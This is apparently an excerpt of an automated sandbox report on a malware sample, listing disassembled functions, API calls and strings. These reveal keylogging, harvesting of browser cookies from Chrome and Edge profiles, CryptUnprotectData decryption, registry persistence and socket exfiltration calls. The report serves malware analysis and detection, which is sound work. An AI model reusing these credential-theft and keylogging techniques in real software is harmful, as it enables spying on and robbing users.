                                                                                                • API String ID: 2536120697-0
                                                                                                • Opcode ID: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
                                                                                                • Instruction ID: a4b3b54c979a96992e2bd1820719d1d15e96ebfc38258379f77cf37beeb677ff
                                                                                                • Opcode Fuzzy Hash: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
                                                                                                • Instruction Fuzzy Hash: 94113A32900514A7CB14EBA5D8058DEBBB89F48324F21006FFA04A73A1DB789E81C7D9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CCD2E7
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD2F9
                                                                                                • _free.LIBCMT ref: 00CCD30B
                                                                                                • _free.LIBCMT ref: 00CCD31D
                                                                                                • _free.LIBCMT ref: 00CCD32F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: f8a3a2ab4980dddfc3ded2d2fb3936f794887b50ea7218a4752db1863dc6bf1b
                                                                                                • Instruction ID: 661d7600a50076d8fe7d7fda977e0184b5958523795b63f8e5c09ffac5bfe99a
                                                                                                • Opcode Fuzzy Hash: f8a3a2ab4980dddfc3ded2d2fb3936f794887b50ea7218a4752db1863dc6bf1b
                                                                                                • Instruction Fuzzy Hash: C3F0127350829577C620DF65E9CAF2A73FDAA007107680D1DF059DB691CF30FE854665
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00450915
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00450927
                                                                                                • _free.LIBCMT ref: 00450939
                                                                                                • _free.LIBCMT ref: 0045094B
                                                                                                • _free.LIBCMT ref: 0045095D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
                                                                                                • Instruction ID: 29a0dbab307c4b395b57238b336e7f1280b31558f0d7efaeec20342ac47a58e2
                                                                                                • Opcode Fuzzy Hash: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
                                                                                                • Instruction Fuzzy Hash: B9F0127650820067A620DB5DE8D3C1B73DDEA057117A6881BF948DB62BC738FCC0CA5C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443FC5
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00443FD7
                                                                                                • _free.LIBCMT ref: 00443FEA
                                                                                                • _free.LIBCMT ref: 00443FFB
                                                                                                • _free.LIBCMT ref: 0044400C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
                                                                                                • Instruction ID: 24c1456feddea9d43312e9cc52bb540d1f60c9f15742623fd6849a2c11194e6b
                                                                                                • Opcode Fuzzy Hash: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
                                                                                                • Instruction Fuzzy Hash: DBF03AB18045208FA671AF2DBD524053B75A705760356412BF81C62A74C77949C2CFCF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00CBD276
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBD6F9
                                                                                                Strings
                                                                                                • invalid stoi argument, xrefs: 00CBD6F4
                                                                                                • stoi argument out of range, xrefs: 00CBD6EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PathTempXinvalid_argumentstd::_
                                                                                                • String ID: invalid stoi argument$stoi argument out of range
                                                                                                • API String ID: 3948722134-1606216832
                                                                                                • Opcode ID: 92b9a09f904c48884e550168ed9f99165cb0b610315655fb13ca24f4ebf0e214
                                                                                                • Instruction ID: 594c6ef5d334150bcb3d83ecc074882896602587aec63805f1cb7af14f8510d4
                                                                                                • Opcode Fuzzy Hash: 92b9a09f904c48884e550168ed9f99165cb0b610315655fb13ca24f4ebf0e214
                                                                                                • Instruction Fuzzy Hash: 2AE115716001485BDF18EF38CD8ABED7B3AAF42344F544618F806876D7EB39DA858792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: *?
                                                                                                • API String ID: 269201875-2564092906
                                                                                                • Opcode ID: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
                                                                                                • Instruction ID: e7514e84bd23bae6fa9768825e37cd913a495a1e8153538b57ef323cd696b15a
                                                                                                • Opcode Fuzzy Hash: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
                                                                                                • Instruction Fuzzy Hash: 04610A75D002199FCB14DFA9C882AEEBBF5EF48310F24816EE855E7340D731AE419B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _strpbrk.LIBCMT ref: 0044E5F8
                                                                                                • _free.LIBCMT ref: 0044E715
                                                                                                  • Part of subcall function 0043BC59: IsProcessorFeaturePresent.KERNEL32(00000017,0043BC2B,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BC4B,00000000,00000000,00000000,00000000,00000000), ref: 0043BC5B
                                                                                                  • Part of subcall function 0043BC59: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BC7D
                                                                                                  • Part of subcall function 0043BC59: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BC84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                • String ID: *?$.
                                                                                                • API String ID: 2812119850-3972193922
                                                                                                • Opcode ID: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
                                                                                                • Instruction ID: 5c43e14eb4c3d169d765f7cc1b0ac18bd00b2d083d68f891a18fbf6c96fdc733
                                                                                                • Opcode Fuzzy Hash: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
                                                                                                • Instruction Fuzzy Hash: 1E51C171E00209AFEF14CFAAC841AAEFBB5FF58314F25416EE454E7301E6399A018B54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32 ref: 00409ED3
                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                  • Part of subcall function 0041C463: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C478
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                • String ID: XQG$NG$PG
                                                                                                • API String ID: 1634807452-3565412412
                                                                                                • Opcode ID: b1d5e324ed03b6578331472fa442b6ee2ff11952c6f207c71cda26659455ef7c
                                                                                                • Instruction ID: 54e7b2e3c22fc6d4453642fd245f9e0f365eb47252e0afba34a901821bea4d9f
                                                                                                • Opcode Fuzzy Hash: b1d5e324ed03b6578331472fa442b6ee2ff11952c6f207c71cda26659455ef7c
                                                                                                • Instruction Fuzzy Hash: E65131315082415AC328F732D851AEFB3E5AFD4348F50493FF44AA71E2EF78594AC649
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000104), ref: 004433D4
                                                                                                • _free.LIBCMT ref: 0044349F
                                                                                                • _free.LIBCMT ref: 004434A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                                • API String ID: 2506810119-3763621502
                                                                                                • Opcode ID: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
                                                                                                • Instruction ID: d495169aa647f9283a7fc5678286d5ac447c1d80eb523621169543331939c4ae
                                                                                                • Opcode Fuzzy Hash: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
                                                                                                • Instruction Fuzzy Hash: B1319571900258BFEB22DF9ADC819DFBBACEB85715F10406BF80497211D6788F81CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                  • Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED
                                                                                                  • Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 004184CC
                                                                                                  • Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 004184D5
                                                                                                  • Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
                                                                                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                • API String ID: 368326130-3219657780
                                                                                                • Opcode ID: 55c07a66b7ce3422725bd62898cf5c4168b4a854fda8ec30082a2f041c2aeaea
                                                                                                • Instruction ID: 2723665aff0001c8eb0dcc99e8f292f7fea15a2d2b61d2442ed78a1fc6e7b378
                                                                                                • Opcode Fuzzy Hash: 55c07a66b7ce3422725bd62898cf5c4168b4a854fda8ec30082a2f041c2aeaea
                                                                                                • Instruction Fuzzy Hash: 58316371A0011956CB15FBA2DC969EE7375AF90308F40007FF206B71E2EF785D89CA99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00416243
                                                                                                  • Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
                                                                                                  • Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
                                                                                                  • Part of subcall function 004137C5: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9
                                                                                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                                • String ID: !D@$okmode$PG
                                                                                                • API String ID: 3411444782-3370592832
                                                                                                • Opcode ID: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
                                                                                                • Instruction ID: 70b78272a37c925ffc2bbf27fe81a39eb2a1877854726b2372d6ef4cdaa99610
                                                                                                • Opcode Fuzzy Hash: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
                                                                                                • Instruction Fuzzy Hash: 7B119371B442011ADA187732E872BBD22969F80358F80443FF546AF2E2DEBD4C41574D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0040C411: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C444
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C56B
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C5D6
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C583
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C551
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
                                                                                                • Instruction ID: 0d3671945d163f179dfc74684fa7d60980301dcab59faebae93cfb08f5644a4c
                                                                                                • Opcode Fuzzy Hash: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
                                                                                                • Instruction Fuzzy Hash: 5C21D37190011ADACB05F7A2DC96CEEB778AE50719B40053FB502B21E2EF78994AC698
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0040C474: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C4A7
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C63A
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6A5
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C652
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
                                                                                                • Instruction ID: cd3ac36060f6dd10227e635323ce9c221b0d05fe1f22e326eaff4c9839abebb3
                                                                                                • Opcode Fuzzy Hash: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
                                                                                                • Instruction Fuzzy Hash: AC21127190011ADACB14F7A2DC96CEEB778BE50719B40053FB502B31E2EF789946C698
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
                                                                                                  • Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AEBC
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AEC8
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AED4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: b284bcf6be9b409c0051a55f077d609e247e1bba3d490e58f0437d83e9f8f86c
                                                                                                • Instruction ID: 35c8ad9330cbabd9a84998b0057f5e9cb1d3334ac0cbf96acddd5b3bbbfc58cf
                                                                                                • Opcode Fuzzy Hash: b284bcf6be9b409c0051a55f077d609e247e1bba3d490e58f0437d83e9f8f86c
                                                                                                • Instruction Fuzzy Hash: 8101C4A06003183AE62072369C8ADBF7E6DCA81398F4004BFF645226C2D9BD1C5586FB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                • API String ID: 2574300362-2380590389
                                                                                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
                                                                                                • Instruction ID: 818ba9a903718bf70962d64877cf58bd49af678424aac798fcc48c71b6ebc0a3
                                                                                                • Opcode Fuzzy Hash: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
                                                                                                • Instruction Fuzzy Hash: 3A01D831A40F40AFD7256B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E781
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
                                                                                                • Instruction ID: 4562612ed5f23909e08b48de68f8a24239844f145e408ccd9de78b4a74cc907a
                                                                                                • Opcode Fuzzy Hash: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
                                                                                                • Instruction Fuzzy Hash: 7101D6719443087AD734EA93CC13FBA33585B20708F648C6BBD01762C2EA7D6961C66E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041376D
                                                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F771,pth_unenc,004752D8), ref: 0041379B
                                                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F771,pth_unenc,004752D8), ref: 004137A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1818849710-4028850238
                                                                                                • Opcode ID: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
                                                                                                • Instruction ID: 39ca638f3a556dbd65d2a0e86665551851d0ba55163acdd2be93936ebda2a735
                                                                                                • Opcode Fuzzy Hash: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
                                                                                                • Instruction Fuzzy Hash: FEF0C271440218FBCF009FA1EC45FEE373CEB00756F10856AF905A61A1EB359E04DA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DEFF
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DF3E
                                                                                                  • Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355A2
                                                                                                  • Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355C6
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DF64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3628047217-1405518554
                                                                                                • Opcode ID: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
                                                                                                • Instruction ID: db90c3436e337910c3e98b764f87bb4696ab9b2babf94f2e459d4bdb298d91bb
                                                                                                • Opcode Fuzzy Hash: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
                                                                                                • Instruction Fuzzy Hash: 29F044316046046AC734FB66DC53A9A73A49F14714F50897FB40A228D2EF7CAA1ECA99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041607E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
